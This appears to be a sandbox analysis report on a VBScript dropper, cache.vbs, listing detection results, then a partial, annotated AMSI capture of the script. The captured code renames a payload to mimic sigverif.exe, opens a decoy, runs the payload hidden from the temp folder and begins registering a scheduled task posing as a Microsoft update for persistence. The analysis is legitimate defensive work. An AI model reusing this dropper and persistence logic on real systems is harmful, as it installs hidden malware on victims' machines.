Source: cache.vbs | ReversingLabs: Detection: 28% |
Source: cache.vbs | Virustotal: Detection: 30% |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: cache.vbs | Initial sample: strings longer than 50 characters found |
Source: classification engine | Classification label: mal64.evad.winVBS@1/0@0/0 |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs" |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (VBScript language engine) |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: captured script buffer, reformatted to one statement per line with comments added; the capture begins mid-statement and is cut off at the end |

WScript.CreateObject("Scripting.FileSystemObject")   ' capture starts here, mid-statement; the object is used below as objFSO
Dim currentPath
currentPath = objFSO.GetAbsolutePathName(".")
' Stage 1: rename the staged payload cache.bak to sigverif.exe, the name of the Windows File Signature Verification tool
strFilePath = currentPath & "\_cache\cache\cache.bak"
strNewFilePath = currentPath & "\_cache\cache\sigverif.exe"
objFSO.MoveFile strFilePath, strNewFilePath
Set objFSO = Nothing
' The decoy document name is stored Base64-encoded; DecodeBase64 is defined elsewhere in the sample and is not part of this capture
Dim filenameb64
filenameb64 = DecodeBase64("5Y2a5aOr5ZCO55Sz6K+3LeeOi+eOieeOui3ljY7kuK3np5HmioDlpKflraYt55S15rCU5LiO55S15a2Q5bel56iL5Y2a5aOrLeeugOWOhi5wZGY=")
Dim fso
Set fso = WScript.CreateObject("Scripting.FileSystemObject")
Dim sourcePath, destinationPath, runfile, runfile2
sourcePath = currentPath & "\_cache\cache\" & "cache.db"
destinationPath = currentPath & "\" & filenameb64
deleteFile = currentPath & "\" & filenameb64 & ".lnk"
runfile = Chr(34) & currentPath & "\_cache\cache\sigverif.exe" & Chr(34)
runfile2 = currentPath & "\_cache\cache\sigverif.exe"
' Stage 2: move the decoy (cache.db) next to the script under the decoded name and delete the .lnk carrying that same name (presumably the lure that started the chain)
fso.MoveFile sourcePath, destinationPath
fso.DeleteFile deleteFile
' Stage 3: copy the payload into the user's temp folder (GetSpecialFolder(2) = TemporaryFolder)
Dim tempFolder, tempPath
tempFolder = fso.GetSpecialFolder(2)
tempPath = tempFolder & "\sigverif.exe"
fso.CopyFile runfile2, tempPath, True
Dim v1
v1 = Chr(34) & destinationPath & Chr(34)
' Stage 4: open the decoy and run the payload from %TEMP%, both with a hidden window (0) and without waiting (False), then remove the staged copy
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run v1, 0, False
WshShell.Run tempPath, 0, False
fso.DeleteFile runfile2
Set WshShell = Nothing
' Stage 5: persistence through a scheduled task whose registration info imitates a Microsoft update task
Dim shellPath
Dim taskName
shellPath = tempPath
taskName = "WpnUserService_x64"
Const TriggerTypeDaily = 1   ' in TASK_TRIGGER_TYPE2, 1 is TASK_TRIGGER_TIME; TASK_TRIGGER_DAILY is 2, so the name is misleading
Const ActionTypeExec = 0
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Update"
regInfo.Author = "Microsoft"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False
settings.DisallowStartIfOnBatteries = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
' Privilege check: HKEY_USERS\S-1-5-19 is the LocalService profile hive, which a non-administrative user normally cannot read;
' if the read succeeds, boot (8) and logon (9) triggers are added on top of the ones every run gets
On Error Resume Next
CreateObject("WScript.Shell").RegRead ("HKEY_USERS\S-1-5-19\Environment\TEMP")
If Err.Number = 0 Then
    IsAdmin = True
    Set trigger = triggers.Create(8)   ' TASK_TRIGGER_BOOT
    Set trigger = triggers.Create(9)   ' TASK_TRIGGER_LOGON
Else
    IsAdmin = False
End If
Err.Clear
On Error GoTo 0
Set trigger = triggers.Create(7)   ' TASK_TRIGGER_REGISTRATION: fires as soon as the task is registered
Set trigger = triggers.Create(6)   ' TASK_TRIGGER_IDLE
Set trigger = triggers.Create(TriggerTypeDaily)   ' TASK_TRIGGER_TIME (see the Const above)
Dim startTime, endTime
Dim time
time = DateAdd("n", 2, Now)   ' two minutes from now
Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
Dim tTime, tDate
cSecond = "0" & Second(time)
cMinute = "0" & Minute(ti   ' AMSI capture ends here